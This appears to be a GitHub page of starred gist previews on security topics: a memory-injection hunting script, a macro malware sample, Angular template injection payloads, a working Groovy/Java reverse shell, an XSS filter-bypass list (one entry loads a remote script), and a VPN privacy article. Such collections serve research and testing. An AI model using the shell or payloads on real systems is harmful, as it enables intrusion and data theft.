Skip to content

Instantly share code, notes, and snippets.

View SleepyLctl's full-sized avatar

Petr Pospíšil SleepyLctl

10 followers · 21 following
View GitHub Profile
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active October 14, 2025 02:45
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
anonymous
anonymous / gist:d0da355e5c21a122866808d37234cd5d
Created October 23, 2016 00:12
PowerShell malware [posted by @JohnLaTwC]
//sample: 1554e74b935a61d446cb634f80d7d1e200e864bc
//posted by @JohnLaTwC
// Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
----------------------------------------------- macro ----------------------------------
Private Sub Workbook_Open()
Call doom_Init
Call doom_ShowHideSheets
End Sub
@mccabe615
mccabe615 / AngularTI.md
Last active September 16, 2025 13:51
Angular Template Injection Payloads

1.3.2 and below

{{7*7}}

'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
@frohoff
frohoff / revsh.groovy
Created March 2, 2016 18:55
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active October 4, 2025 22:33
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@jeremybuis
jeremybuis / angular.sandbox.escapes.md
Created January 27, 2016 15:31
Angular Sandbox Escape Cheatsheet
@joepie91
joepie91 / vpn.md
Last active November 10, 2025 16:47
Don't use VPN services.

Don't use VPN services.

No, seriously, don't. You're probably reading this because you've asked what VPN service to use, and this is the answer.

Note: The content in this post does not apply to using VPN for their intended purpose; that is, as a virtual private (internal) network. It only applies to using it as a glorified proxy, which is what every third-party "VPN provider" does.

  • A Russian translation of this article can be found here, contributed by Timur Demin.
  • A Turkish translation can be found here, contributed by agyild.
  • There's also this article about VPN services, which is honestly better written (and has more cat pictures!) than my article.